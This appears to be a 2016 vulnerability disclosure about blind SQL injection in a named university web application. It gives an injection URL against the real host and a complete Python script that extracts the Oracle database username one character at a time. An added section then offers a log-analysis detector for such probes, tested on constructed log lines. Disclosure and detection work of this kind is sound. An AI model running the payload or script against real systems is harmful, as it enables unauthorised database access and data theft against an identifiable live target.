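2016-05-03: Details reported to the vendor; awaiting vendor action.
2016-05-09: The vendor actively ignored the vulnerability; details disclosed to the public.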
http://smulsc.shmtu.edu.cn/rsgl/jbdainfo_qiantai.jsp?zgbh=-1' OR length(SYS_CONTEXT('USERENV','CURRENT_USER'))=4 AND '1'='1
When the condition is true:
When the condition is false:
The USER length is 4:
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']

print 'start to retrive Oracle user:'
user = ''
for i in range(1,5,1):
    for payload in payloads:
        s = "ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s" % (i, ord(payload))
        s = "-1' or %s and '1'='1" % s
        conn = httplib.HTTPConnection('smulsc.shmtu.edu.cn', timeout=30)
        conn.request(method='GET',url="/rsgl/jbdainfo_qiantai.jsp?zgbh=%s" % urllib.quote(s))
        html_doc = conn.getresponse().read()
        #print html_doc
        conn.close()
        print '.',
        if html_doc.find('500') > 0:    # true
            user += payload
            print '\n[in progress]', user
            break
print '\nOracle user is', user
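
Seen from the server side, a character-by-character extraction like the script above appears in the access log as one client sending many requests whose zgbh value differs only in the position and character code being compared. The following is an added example, not part of the original report: it URL-decodes query strings and groups such comparisons by client, path and parameter. The simplified log format, the client addresses and the find_blind_sqli helper are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample data: simplified access-log lines (client, request, status).
# Client addresses come from documentation ranges; P mirrors the URL-encoded
# comparison the report's script sends in the zgbh parameter.
P = ("-1%27%20or%20ascii%28substr%28SYS_CONTEXT%28%27USERENV%27%2C"
     "%27CURRENT_USER%27%29%2C{pos}%2C1%29%29%3D{code}%20and%20%271%27%3D%271")
SAMPLE_LOG = [
    '198.51.100.7 "GET /rsgl/jbdainfo_qiantai.jsp?zgbh=%s HTTP/1.1" 200'
    % P.format(pos=1, code=c) for c in range(97, 103)
] + [
    '203.0.113.9 "GET /rsgl/jbdainfo_qiantai.jsp?zgbh=10023 HTTP/1.1" 200',
    '203.0.113.9 "GET /rsgl/jbdainfo_qiantai.jsp?zgbh=O%27Brien HTTP/1.1" 200',
]

# Assumed log layout: client address first, request line in double quotes.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# One character guess, e.g. ascii(substr(<expr>,3,1))=97 -> position 3, code 97.
GUESS = re.compile(
    r"ascii\s*\(\s*substr\s*\(.+,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I)

def find_blind_sqli(lines, min_guesses=5):
    """Return {(client, path, param): sorted [(position, char_code), ...]} for
    every client that sent at least min_guesses distinct character guesses."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes each value before the pattern is applied.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            g = GUESS.search(value)
            if g:
                seen[(client, url.path, name)].add(
                    (int(g.group(1)), int(g.group(2))))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_guesses}

if __name__ == "__main__":
    for (client, path, param), guesses in find_blind_sqli(SAMPLE_LOG).items():
        print(client, path, param, "distinct guesses:", len(guesses))
```

A single quote in a value, as in the second constructed benign request, does not trigger the check; only repeated comparison probes against the same parameter do.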
Severity: No impact (ignored by vendor)
Ignored at: 2016-05-09 09:00
Vulnerability Rank: 4 (WooYun rating)